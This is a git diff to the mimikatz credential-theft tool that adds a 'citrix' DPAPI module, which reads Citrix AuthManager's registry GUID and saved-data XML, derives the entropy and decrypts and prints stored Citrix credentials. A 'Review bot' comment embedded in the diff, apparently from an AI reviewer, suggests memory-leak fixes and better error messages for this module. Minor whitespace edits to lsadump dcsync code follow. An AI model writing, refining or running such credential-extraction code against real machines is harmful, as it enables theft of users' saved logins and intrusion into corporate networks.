diff --git a/mimikatz/mimikatz.vcxproj b/mimikatz/mimikatz.vcxproj
index 3cf2c5d7..1fff23de 100644
--- a/mimikatz/mimikatz.vcxproj
+++ b/mimikatz/mimikatz.vcxproj
@@ -173,6 +173,7 @@
+
@@ -289,6 +290,7 @@
+
diff --git a/mimikatz/mimikatz.vcxproj.filters b/mimikatz/mimikatz.vcxproj.filters
index 87968706..05519879 100644
--- a/mimikatz/mimikatz.vcxproj.filters
+++ b/mimikatz/mimikatz.vcxproj.filters
@@ -329,6 +329,9 @@
common modules\rpc
+
+ local modules\dpapi\packages
+
@@ -677,6 +680,9 @@
common modules\rpc
+
+ local modules\dpapi\packages
+
diff --git a/mimikatz/modules/dpapi/kuhl_m_dpapi.c b/mimikatz/modules/dpapi/kuhl_m_dpapi.c
index 7d8671af..fdc3b029 100644
--- a/mimikatz/modules/dpapi/kuhl_m_dpapi.c
+++ b/mimikatz/modules/dpapi/kuhl_m_dpapi.c
@@ -27,6 +27,7 @@ const KUHL_M_C kuhl_m_c_dpapi[] = {
{kuhl_m_dpapi_cloudap_keyvalue_derived, L"cloudapkd", L""},
{kuhl_m_dpapi_cloudap_fromreg, L"cloudapreg", L""},
{kuhl_m_dpapi_sccm_networkaccessaccount, L"sccm", L""},
+ {kuhl_m_dpapi_citrix, L"citrix", L""},
{kuhl_m_dpapi_oe_cache, L"cache", NULL},
};
const KUHL_M kuhl_m_dpapi = {
diff --git a/mimikatz/modules/dpapi/kuhl_m_dpapi.h b/mimikatz/modules/dpapi/kuhl_m_dpapi.h
index a51b4857..30b7b3d1 100644
--- a/mimikatz/modules/dpapi/kuhl_m_dpapi.h
+++ b/mimikatz/modules/dpapi/kuhl_m_dpapi.h
@@ -20,6 +20,7 @@
#include "packages/kuhl_m_dpapi_lunahsm.h"
#include "packages/kuhl_m_dpapi_cloudap.h"
#include "packages/kuhl_m_dpapi_sccm.h"
+#include "packages/kuhl_m_dpapi_citrix.h"
const KUHL_M kuhl_m_dpapi;
diff --git a/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c
new file mode 100644
index 00000000..3ac4421d
--- /dev/null
+++ b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c
@@ -0,0 +1,89 @@
+/* Benjamin DELPY `gentilkiwi`
+ https://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kuhl_m_dpapi_citrix.h"
+
+const char CITRIX_SAVED_CREDENTIALS_GUID[] = "{921BB3E1-15EE-4bbe-83D4-C4CE176A481B}";
+NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[])
+{
+ PKULL_M_REGISTRY_HANDLE hRegistry;
+ PBYTE pbData;
+ DWORD cbData;
+ LPCWSTR szData;
+ LPWSTR szGuid = NULL, szUrl, szBase64, szSavedCreds;
+ LPSTR sEntropy;
+ IXMLDOMDocument *pXMLDom;
+ IXMLDOMNode *pNode;
+ LPVOID pDataOut;
+ DWORD dwDataOutLen;
+
+ if(kull_m_string_args_byName(argc, argv, L"guid", &szData, NULL))
+ {
+ kull_m_string_copy(&szGuid, szData);
+ }
+ else if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_OWN, NULL, FALSE, &hRegistry)) // todo: offline
+ {
+ //For v3, KEY_WOW64_32KEY
+ kull_m_registry_OpenAndQueryWithAlloc(hRegistry, HKEY_LOCAL_MACHINE, L"SOFTWARE\\"
+ #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
+ L"WOW6432Node\\"
+ #endif
+ L"Citrix\\AuthManager", L"Guid", NULL, (LPVOID *) &szGuid, NULL);
+ kull_m_registry_close(hRegistry);
+ }
+
+ if(szGuid)
+ {
+ kprintf(L"Citrix instance GUID : %s\n", szGuid);
+
+ if(kull_m_string_args_byName(argc, argv, L"in", &szData, NULL))
+ {
+ kprintf(L"Using saved data from: %s\n", szData);
+ if(pXMLDom = kull_m_xml_CreateAndInitDOM())
+ {
+ if(kull_m_xml_LoadXMLFile(pXMLDom, szData))
+ {
+ if((IXMLDOMDocument_selectSingleNode(pXMLDom, (BSTR) L"//Data/Item", &pNode) == S_OK) && pNode)
+ {
+ szUrl = kull_m_xml_getAttribute(pNode, L"url");
+ if(szUrl)
+ {
+ kprintf(L"URL: %s\n", szUrl);
+ kull_m_string_sprintfA(&sEntropy, "%S%s%S", szUrl, CITRIX_SAVED_CREDENTIALS_GUID, szGuid);
+ if(sEntropy)
+ {
+ if(IXMLDOMNode_get_text(pNode, &szBase64) == S_OK)
+ {
+ if(kull_m_string_quick_base64_to_Binary(szBase64, &pbData, &cbData))
+ {
+ if(kuhl_m_dpapi_unprotect_raw_or_blob(pbData, cbData, NULL, argc, argv, sEntropy, lstrlenA(sEntropy), &pDataOut, &dwDataOutLen, NULL))
+ {
+ if(kull_m_string_copy_len(&szSavedCreds, (LPCWSTR) pDataOut, dwDataOutLen / sizeof(wchar_t)))
+ {
+ UrlUnescapeInPlace(szSavedCreds, 0);
+ kprintf(L" > Saved data: %s\n", szSavedCreds);
+ LocalFree(szSavedCreds);
+ }
+ LocalFree(pDataOut);
+ }
+ }
+ SysFreeString(szBase64);
+ }
+ LocalFree(sEntropy);
+ }
+ LocalFree(szUrl);
+ }
+ }
+ }
+ kull_m_xml_ReleaseDom(pXMLDom);
+ }
+ }
+ else PRINT_ERROR(L"Input Citrix saved data needed (/in:%%localappdata%%\\Citrix\\AuthManager\\Data\\)\n");
+ LocalFree(szGuid);
+ }
+ else PRINT_ERROR(L"No instance GUID ? (use /guid:xxx (without {} to specify\n");
+
+ return STATUS_SUCCESS;
+}
\ No newline at end of file
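Review bot: Two resources acquired in kuhl_m_dpapi_citrix are never released anywhere in this new file: the `pbData` buffer filled by kull_m_string_quick_base64_to_Binary and the `pNode` interface returned by IXMLDOMDocument_selectSingleNode. Add `LocalFree(pbData);` after the kuhl_m_dpapi_unprotect_raw_or_blob block (assuming the helper allocates with LocalAlloc, like the other buffers freed here) and `IXMLDOMNode_Release(pNode);` before the selectSingleNode block closes. Every failing step between loading the XML file and the unprotect call is also silent, so a malformed file or a failed base64 decode prints nothing; an `else PRINT_ERROR(...)` on those branches would match the two that already exist. The final message `(use /guid:xxx (without {} to specify` has an unbalanced parenthesis.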
diff --git a/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h
new file mode 100644
index 00000000..441b5eb2
--- /dev/null
+++ b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h
@@ -0,0 +1,9 @@
+/* Benjamin DELPY `gentilkiwi`
+ https://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#pragma once
+#include "../kuhl_m_dpapi.h"
+
+NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[]);
\ No newline at end of file
diff --git a/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c b/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
index 38166a63..46c267ea 100644
--- a/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
+++ b/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
@@ -133,7 +133,6 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[1];
}
-
RpcTryExcept
{
do
@@ -2276,7 +2275,6 @@ BOOL kuhl_m_lsadump_dcshadow_build_replication(PDCSHADOW_DOMAIN_INFO info)
kprintf(L" uidOriginatingDsa:");
kull_m_string_displayGUID(&attr->MetaData.uidOriginatingDsa);
kprintf(L"\n");
-
}
kprintf(L"\n");
}